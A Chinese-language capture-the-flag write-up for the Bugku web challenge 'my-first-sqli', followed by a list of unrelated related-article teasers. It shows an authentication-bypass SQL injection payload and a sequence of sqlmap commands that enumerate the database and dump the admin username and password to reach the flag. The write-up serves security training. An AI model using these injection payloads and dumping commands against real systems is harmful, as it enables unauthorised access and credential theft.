Bugku CTF_Web——my-first-sqli

news2025/10/31 23:49:12

Bugku CTF_Web——my-first-sqli

进入靶场

在这里插入图片描述

随便输一个看看

在这里插入图片描述

点login没有任何回显

方法一:

上bp抓包

在这里插入图片描述

放到repeter测试

在这里插入图片描述

试试万能密码(靶机过期了重新开了个靶机)

'admin or 1=1--+

在这里插入图片描述

shellmates{SQLi_goeS_BrrRrRR}

方法二:

拿包直接梭哈sqlmap

爆库

python sqlmap.py -r "***.txt"  --dbs

在这里插入图片描述

接着爆表

python sqlmap.py -r "***.txt"  -D SQLite --tables

+-------+
| users |
+-------+

在这里插入图片描述

爆字段

python sqlmap.py -r "***.txt"  -D SQLite -T users --columns

+----------+------+
| Column   | Type |
+----------+------+
| password | TEXT |
| username | TEXT |
+----------+------+

在这里插入图片描述

读取字段

查看username和password

python sqlmap.py -r "***.txt"  -D SQLite -T users -C username --dump

+----------+
| username |
+----------+
| admin    |
+----------+

在这里插入图片描述

接下来读取password就行了

python sqlmap.py -r "***.txt"  -D SQLite -T users -C password --dump

+----------------------------------------+
| password                               |
+----------------------------------------+
| sYbtomeoGjP62xPS05wqHY5R7cZqFW5jD0Cg6w |
+----------------------------------------+

在这里插入图片描述

登录试试

在这里插入图片描述

在这里插入图片描述

拿到flag

shellmates{SQLi_goeS_BrrRrRR}

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2246558.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

BUUCTF—Reverse—easyre(1)

BUUCTF—Reverse—easyre(1)

非常简单的逆向 拿到exe文件先查下信息,是一个64位程序,没有加壳(壳是对代码的加密,起混淆保护的作用,一般用来阻止逆向)。 然后拖进IDA(64位)进行反汇编 打开以后就可以看到flag flag{this_Is_a_EaSyRe}
阅读更多...
全面击破工程级复杂缓存难题

全面击破工程级复杂缓存难题

目录 一、走进业务中的缓存 (一)本地缓存 (二)分布式缓存 二、缓存更新模式分析 (一)Cache Aside Pattern(旁路缓存模式) 读操作流程 写操作流程 流程问题思考 问题1&#…
阅读更多...
React基础知识一

React基础知识一

写的东西太多了,照成csdn文档编辑器都开始卡顿了,所以分篇写。 1.安装React 需要安装下面三个包。 react:react核心包 react-dom:渲染需要用到的核心包 babel:将jsx语法转换成React代码的工具。(没使用jsx可以不装)1.1 在html中…
阅读更多...
Vue3中使用:deep修改element-plus的样式无效怎么办?

Vue3中使用:deep修改element-plus的样式无效怎么办?

前言:当我们用 vue3 :deep() 处理 elementui 中 el-dialog_body和el-dislog__header 的时候样式一直无法生效,遇到这种情况怎么办? 解决办法: 1.直接在 dialog 上面增加class 我试过,也不起作用,最后用这种…
阅读更多...
鸿蒙进阶-状态管理

鸿蒙进阶-状态管理

大家好啊,这里是鸿蒙开天组,今天我们来学习状态管理。 开始组件化开发之后,如何管理组件的状态会变得尤为重要,咱们接下来系统的学习一下这部分的内容 状态管理机制 在声明式UI编程框架中,UI是程序状态的运行结果&a…
阅读更多...
leetcode:129. 求根节点到叶节点数字之和

leetcode:129. 求根节点到叶节点数字之和

给你一个二叉树的根节点 root ,树中每个节点都存放有一个 0 到 9 之间的数字。 每条从根节点到叶节点的路径都代表一个数字: 例如,从根节点到叶节点的路径 1 -> 2 -> 3 表示数字 123 。 计算从根节点到叶节点生成的 所有数字之和 。…
阅读更多...
(南京观海微电子)——GH7006+BOE2.6_GV026WVQ-N81-1QP0_800RGB480_MIPI_LVDS_RGB原理介绍

(南京观海微电子)——GH7006+BOE2.6_GV026WVQ-N81-1QP0_800RGB480_MIPI_LVDS_RGB原理介绍

1. 原理介绍 2. 代码 // Model - GV026WVQ-1QP0 // IC - GH7006 // Width - 800 // Height - 480 // REV: - V01 // DATA - 20240507 // INTERFACE- MIPI //"Vfp" value"16" /> //"…
阅读更多...
速度革命:esbuild如何改变前端构建游戏 (1)

速度革命:esbuild如何改变前端构建游戏 (1)

什么是 esbuild? esbuild 是一款基于 Go 语言开发的 JavaScript 构建打包工具,以其卓越的性能著称。相比传统的构建工具(如 Webpack),esbuild 在打包速度上有着显著的优势,能够将打包速度提升 10 到 100 倍…
阅读更多...
Excel的图表使用和导出准备

Excel的图表使用和导出准备

目的 导出Excel图表是很多软件要求的功能之一,那如何导出Excel图表呢?或者说如何使用Excel图表。 一种方法是软件生成图片,然后把图片写到Excel上,这种方式,因为格式种种原因,导出的图片不漂亮&#xff0c…
阅读更多...
自动化运维-Linux通用性日志切割脚本

自动化运维-Linux通用性日志切割脚本

一、公司提供的参考脚本: #!/bin/bash # 定义需要清理的文件 log_file("/mpjava/ly.mp.dfpv.acc.biz/bin/nohup.out""/mpjava/ly.mp.dfpv.acc.service/bin/nohup.out"# 添加更多微服务的日志目录路径 ) # 获取当天日期 date_now$(date %Y%m%d)…
阅读更多...
Let‘s Encrypt SSL证书:acmessl.cn申请免费3个月证书

Let‘s Encrypt SSL证书:acmessl.cn申请免费3个月证书

目录 一、CA机构 二、Lets Encrypt特点 三、申请SSL 一、CA机构 ‌Lets Encrypt‌是一个由非营利组织Internet Security Research Group (ISRG)运营的证书颁发机构(CA),旨在通过自动化和开放的方式为全球网站提供免费、可靠的SSL/TLS证书。…
阅读更多...
Java连接MySQL数据库进行增删改查操作

Java连接MySQL数据库进行增删改查操作

Test 1 首先去查看一下MySQL的版本:mysql -V(在cmd中)记得要启动MySQL服务在cmd中验证是否可以登录数据库成功:mysql -u root -p(然后输入密码:root)Test 2 在IDEA创建项目在SQLyog中创建数据…
阅读更多...
从搭建uni-app+vue3工程开始

从搭建uni-app+vue3工程开始

技术栈 uni-app、vue3、typescript、vite、sass、uview-plus、pinia 一、项目搭建 1、创建以 typescript 开发的工程 npx degit dcloudio/uni-preset-vue#vite-ts my-vue3-project2、安装sass npm install -D sass// 安装sass-loader,注意需要版本10,…
阅读更多...
React (三)

React (三)

文章目录 项目地址十二、性能优化12.1 使用useMemo避免不必要的计算12.2 使用memo缓存组件,防止过度渲染12.3 useCallBack缓存函数12.4 useCallBack里访问之前的状态(没懂)十三、Styled-Components13.1 安装13.2给普通html元素添加样式13.3 继承和覆盖样式13.4 给react组件添…
阅读更多...
javascrip页面交互

javascrip页面交互

元素的三大系列 offset系列 offset初相识 offset系列属性 作用 element.offsetParent 返回作为该元素带有定位的父级元素,如果父级没有定位,则返回body element.offsetTop 返回元素相对于有定位父元素上方的偏移量 element.offsetLeft 返回元素…
阅读更多...
生成对抗网络(简要介绍)

生成对抗网络(简要介绍)

生成对抗网络(Generative Adversarial Network,GAN)是一种深度学习模型架构,由 Ian Goodfellow 等人在 2014 年提出。GAN 由两个神经网络组成——生成器(Generator)和判别器(Discriminator&…
阅读更多...
(C语言)文件操作

(C语言)文件操作

目录 文件 程序文件 数据文件 文件名 ​编辑数据文件的分类 文件的打开和关闭 流 标准流 1)stdin 2)stdout 3)stderr 文件指针 文件的打开和关闭 对文件内容操作的函数 1)fgetc,fputc 2)fp…
阅读更多...
招商蛇口|在低密园林里,开启生活的“任意门”

招商蛇口|在低密园林里,开启生活的“任意门”

“最好的建筑是这样的,我们深处在其中,却不知道自然在哪里终了,艺术在哪里开始。” 凭借深耕西安10载的城市远见,以及建立在成功人居经验之上的敏锐洞察,招商蛇口将林语堂名言里的生活,变成了现实。 都市化越是加速&…
阅读更多...
【es6进阶】vue3中的数据劫持的最新实现方案的proxy的详解

【es6进阶】vue3中的数据劫持的最新实现方案的proxy的详解

vuejs中实现数据的劫持,v2中使用的是Object.defineProperty()来实现的,在大版本v3中彻底重写了这部分,使用了proxy这个数据代理的方式,来修复了v2中对数组和对象的劫持的遗留问题。 proxy是什么 Proxy 用于修改某些操作的默认行为&#xff0…
阅读更多...
掌上单片机实验室 – RT-Thread + ROS2 初探(25)

掌上单片机实验室 – RT-Thread + ROS2 初探(25)

在初步尝试RT-Thread之后,一直在琢磨如何进一步感受它的优点,因为前面只是用了它的内核,感觉和FreeRTOS、uCOS等RTOS差别不大,至于它们性能、可靠性上的差异,在这种学习性的程序中,很难有所察觉。 RT-Threa…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023